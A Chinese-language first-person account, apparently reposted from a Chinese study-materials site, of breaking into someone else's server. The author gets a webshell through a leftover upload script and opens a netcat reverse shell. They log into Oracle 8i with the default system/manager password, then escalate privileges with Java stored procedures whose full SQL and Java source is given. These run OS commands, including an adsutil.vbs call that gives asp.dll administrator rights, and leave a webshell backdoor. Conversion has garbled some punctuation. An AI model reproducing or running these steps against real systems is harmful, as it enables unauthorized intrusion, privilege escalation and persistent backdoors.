利用ORACLE系统账户默认口令提升权限 PDF转换可能丢失 图片或格式,建议阅读原文

https://www.100test.com/kao\_ti2020/143/2021\_2022\_\_E5\_88\_A9\_ E7\_94\_A8ORAC\_c102\_143709.htm 近日,偶到一主机上逛了一 圈。主机的配置还算是安全,偏偏一个比较隐藏的目录下残 留了upfile.asp,结果轻轻松松的得到了webshell。接着在主机 上逛了逛,拿出superscan从外面扫了下,只开放了80端口。 从user\程序目录里,发现有一快捷方式:firecontrol,好象是 某款硬件防火墙的控制台。WEBSHELL下检测了下开放的服 务,发现一般的可提权的方法都不可行,无SERV-U等等,主 机的补丁也是打到了最新。试了下传了个NC上去,反连接得 到一SHELL,这下比在老兵的管理器里舒服多了。在C盘下 看到一个目录oracle,看了

下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,确定了 主机的服务名"xxx",看了下版本"oracle 8i",用数据库 连接器 Provider=MSDAORA.1.Password=manager.User ID=system.DataSource=xxx试了下默认的system账户,密 码manager,结果真的就连接到了本地的oracle服务。这下好 了,oracle的system账户就像是mssql下的sa,我们来通过他来 提升权限,马上编辑了几个脚本。1.sql create or replace and compilejava source named "Util"asimport java.io.\*. import java.lang.\*. public class Util extends Object{public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(). int rc = -1. try{Process p = rt.exec(args). int bufSize = 4096. BufferedInputStream bis =new

BufferedInputStream(p.getInputStream(), bufSize). int len.byte

buffer[] = new byte[bufSize]. // Echo back what the program spit out while ((len = bis.read(buffer, 0, bufSize)) != -1) System.out.write(buffer, 0, len). rc = p.waitFor(). } catch (Exception e) { e.printStackTrace(). rc = -1. } finally{return rc. } }}2.sql create or replacefunction RUN\_CMD(p\_cmd in varchar2) return numberaslanguage javaname Util.RunThis(java.lang.String) return integer.3.sql create or replace procedure RC(p\_cmd in varchar2)asx number.beginx := run\_cmd(p\_cmd).end. 保存在c:\下,然后用反 连接得到的shell运行 sqlplus system/manager@xxx然后再来执行 脚本 SQL>@C:\1.sqlSQL>@C:\2.sqlSQL>@C:\3.sql看到JAVA已 创建、函数已创建、过程已创建,接着我们继续 SQL> variable x number.SQL> set serveroutput onSQL> exec dbms\_java.set\_output(100000).SQL>grant javasyspriv to system看 到授权成功。 接着我们就可以来执行系统命令了。我想先 把ASP.dll加入特权一组 SQL>exec :x := RUN\_CMD(cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.dll").看到过程已经成功完成,这 个时候我们重新登陆我们的webshell,他已经具有admin权限 了。接着,再用NC返回一个shell,已经是管理权限的,我们 可以做我们想干的事了。因为这个主机有防火墙过滤除80以 外的端口,所以不好做图形的后门,只有留下一有权限 的webshell。到此已经提权成功。 100Test 下载频道开通, 各 类考试题目直接下载。详细请访问 www.100test.com